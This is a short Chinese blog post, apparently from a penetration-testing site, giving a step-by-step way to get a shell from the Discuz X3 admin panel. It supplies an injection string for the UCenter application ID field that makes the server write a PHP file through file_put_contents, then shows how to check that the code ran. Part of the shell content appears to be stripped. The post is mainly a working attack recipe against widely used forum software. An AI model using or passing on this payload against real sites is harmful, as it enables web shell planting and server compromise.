1. 首页
  2. 渗透测试

Discuz X3 后台拿 shell

适用于 Discuz X3.3 及之前版本

魔术引号需关闭

站长 – Ucenter 设置 – Ucenter 应用 ID

填入 123');file_put_contents('a.php','');//

它将在同目录下生成a.php 内容为 “
Discuz X3 后台拿 shell
保存

本地查看 config_ucenter.php
Discuz X3 后台拿 shell
访问 /config/config_ucenter.php
Discuz X3 后台拿 shell
空白

file_put_contents 执行成功
Discuz X3 后台拿 shell
Discuz X3 后台拿 shell

原创文章,作者:Y4er,未经授权禁止转载!如若转载,请联系作者:Y4er

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论列表(1条)

  • bigtotoro 2019年8月4日 上午12:48

    别人用宝塔可以吗?一会插烂了咋办

联系我们

在线咨询:点击这里给我发消息

QR code